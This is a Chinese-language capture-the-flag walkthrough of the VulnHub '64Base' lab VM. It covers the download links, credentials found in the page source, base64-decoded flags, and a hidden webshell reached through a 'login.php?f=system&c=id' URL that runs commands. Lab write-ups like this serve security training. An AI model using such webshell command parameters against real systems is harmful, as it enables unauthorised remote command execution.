目录
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- 64Base_3mrgnc3.ova (Size: 1.5 GB)
- Download: https://www.dropbox.com/s/30zw231gg523ah8/64Base_3mrgnc3-v1.0.1.ova?dl=0
- Download (Mirror): https://download.vulnhub.com/64base/64Base_3mrgnc3.ova
- Download (Torrent): https://download.vulnhub.com/64base/64Base_3mrgnc3.ova.torrent ( Magnet)
信息收集
访问80页面
查看源码
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
需要账户和密码
http://192.168.243.162/Imperial-Class/BountyHunter/
源码显示
(64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)登录,登录成功
root@kali:~# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r | base64 --decode
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
root@kali:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA
根据结果,访问此视频链接,发现视频的名字提示使用 Burp
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
root@kali:~# echo 'NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=' | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
登录 webshell
使用浏览器访问页面:http://IP//Imperial-Class/BountyHunter/login.php?f=exec&c=id 无响应
突然有提示:
IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377
构造 URL:
http:// IP//Imperial-Class/BountyHunter/login.php?f=system&c=id
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
64base:64base5h377
无法执行
PATH 路径
